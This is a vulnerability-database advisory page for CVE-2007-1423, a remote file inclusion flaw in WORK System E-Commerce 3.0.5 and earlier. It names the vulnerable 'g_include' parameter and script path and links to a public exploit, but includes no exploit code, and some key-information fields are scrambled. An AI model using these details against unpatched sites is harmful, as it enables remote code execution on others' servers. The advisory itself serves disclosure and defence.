Remote File Inclusion Vulnerability in WORK System E-Commerce Software
CVE-2007-1423

Currently unrated

Key Information:

Vendor: Work System E-commerce
Status: Work System E-commerce
Vendor: CVE Published:; 13 March 2007

🔔 Create Work System E-commerce Vulnerability Alert

Badges

👾 Exploit Exists🟡 Public PoC

What is CVE-2007-1423?

Multiple remote file inclusion vulnerabilities exist in WORK System E-Commerce versions 3.0.5 and earlier, allowing attackers to execute arbitrary PHP code. By exploiting these vulnerabilities through the 'g_include' parameter when interacting with 'include/include_top.php' and some other PHP scripts, malicious actors can compromise affected systems, posing significant security risks to users and their data. It's crucial for users to update their software to the latest version to mitigate these vulnerabilities.

Exploit Proof of Concept (PoC)

PoC code is written by security researchers to demonstrate the vulnerability can be exploited. PoC code is also a key component for weaponization which could lead to ransomware.

CVE-2007-1423 - Proof of Concept

References

http://www.securityfocus.com/bid/22908

vdb-entryx_refsource_BID

http://osvdb.org/33973

vdb-entryx_refsource_OSVDB

https://www.exploit-db.com/exploits/3448

exploitx_refsource_EXPLOIT-DB

EPSS Score

5% chance of being exploited in the next 30 days.

Download the Critical Vulnerability Management Cheat Sheet

Timeline

🟡
Public PoC available
Mar 13, 2007
👾
Exploit known to exist
Mar 13, 2007
Vulnerability published
Mar 13, 2007
Vulnerability Reserved
Mar 12, 2007

CVE-2007-1423 Data

JSON